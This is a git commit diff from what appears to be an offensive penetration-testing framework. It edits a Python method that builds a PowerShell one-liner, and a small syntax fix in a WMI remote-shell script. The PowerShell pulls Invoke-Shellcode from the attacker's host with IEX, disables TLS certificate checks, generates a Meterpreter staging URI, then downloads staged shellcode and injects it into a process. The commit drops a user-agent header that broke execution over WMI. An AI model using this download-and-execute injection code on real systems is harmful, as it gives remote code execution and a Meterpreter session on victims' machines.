Adding a user-agent to the HTTP/S request when downloading the Meterpreter staged shellcode would cause a rpc_access_denied error

when executing the PS code with WMI. Have to investigate why, for now removed the offending code and everything seems to be working perfectly.
2015-12-25 12:54:02 -07:00 · 2015-12-25 12:54:02 -07:00 · a1e113520a
parent 3d0203a780
commit a1e113520a
2 changed files with 7 additions and 16 deletions
--- a/core/powershell.py
+++ b/core/powershell.py
@ -94,29 +94,21 @@ class PowerShell:
    def inject_meterpreter(self):
        #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
        #so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
-        
-        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{}://{}:{}/Invoke-Shellcode.ps1');

-        $UserAgent = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').'User Agent'
+        command = """
+        IEX (New-Object Net.WebClient).DownloadString('{}://{}:{}/Invoke-Shellcode.ps1')
        $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {{[Char]$_}}
        $SumTest = $False
-
-        while ($SumTest -eq $False) 
+        while ($SumTest -eq $False)
        {{
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }}
-
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$True}}
        $RequestUri = -join $GeneratedUri
-        $Request = "{}://{}:{}/$($RequestUri)" 
- 
-        $Uri = New-Object Uri($Request)
+        $Request = "{}://{}:{}/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
-        $WebClient.Headers.Add('user-agent', "$UserAgent")
-        [Byte[]] $bytes = $WebClient.DownloadData($Uri)
-
+        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-{} -Force -Shellcode $bytes""".format(self.protocol,
                                                     self.localip,
                                                     settings.args.server_port,
@ -124,11 +116,10 @@ class PowerShell:
                                                     settings.args.met_options[0],
                                                     settings.args.met_options[1],
                                                     self.func_name)
+
        if settings.args.procid:
            command += " -ProcessID {}".format(settings.args.procid)

-        command += ';'
-
        return ps_command(command)

    def inject_shellcode(self):
--- a/core/scripts/wmiexec.py
+++ b/core/scripts/wmiexec.py
@ -75,7 +75,7 @@ class WMIEXEC:
        try:
            self.shell = RemoteShell(self.__share, win32Process, smbConnection)
            self.shell.onecmd(self.__command)
-        except  (Exception, KeyboardInterrupt), e:
+        except (Exception, KeyboardInterrupt) as e:
            logging.error(str(e))
            dcom.disconnect()